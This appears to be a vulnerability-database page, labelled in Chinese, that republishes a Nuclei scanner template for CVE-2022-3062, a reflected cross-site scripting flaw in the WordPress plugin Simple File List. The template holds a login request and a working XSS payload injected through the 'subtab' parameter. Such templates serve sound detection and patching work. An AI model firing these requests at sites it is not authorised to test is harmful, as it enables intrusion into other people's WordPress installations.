CVE-2022-3062: Simple File List < 4.4.12 - Cross Site Scripting

日期: 2025-08-01 | 影响软件: Simple File List | POC: 已公开

漏洞描述

The plugin does not escape parameters before outputting them back in attributes, leading to Reflected Cross-Site Scripting

PoC代码[已公开]

id: CVE-2022-3062

info:
  name: Simple File List < 4.4.12 - Cross Site Scripting
  author: r3Y3r53
  severity: medium
  description: |
    The plugin does not escape parameters before outputting them back in attributes, leading to Reflected Cross-Site Scripting
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
  remediation: Fixed in version 4.4.12
  reference:
    - https://wpscan.com/vulnerability/2e829bbe-1843-496d-a852-4150fa6d1f7a
    - https://nvd.nist.gov/vuln/detail/CVE-2022-3062
    - https://wordpress.org/plugins/simple-file-list/
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2022-3062
    cwe-id: CWE-79
    epss-score: 0.40293
    epss-percentile: 0.97261
    cpe: cpe:2.3:a:simplefilelist:simple-file-list:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: simplefilelist
    product: simple-file-list
    framework: wordpress
  tags: cve,cve2022,authenticated,wordpress,wp-plugin,wp,wpscan,xss,simple-file-list,simplefilelist

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In
      - |
        GET /wp-admin/?page=ee-simple-file-list&tab=settings&subtab="style=animation-name:rotation+onanimationstart=alert(document.domain)// HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code_2 == 200'
          - 'contains(header_2, "text/html")'
          - 'contains(body_2, "ee-simple-file-list")'
          - 'contains(body_2, "onanimationstart=alert(document.domain)//")'
        condition: and
# digest: 490a0046304402201699bea8dccd9e3b78a6ecc58aed77e9734f45d256c7a2f0bee587db2418eac10220521a13e349f64f72823b3de9d00bbd2da5bbf857e8ce1ceb9779eae9396ba056:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2022/CVE-2022-3062.yaml

相关漏洞推荐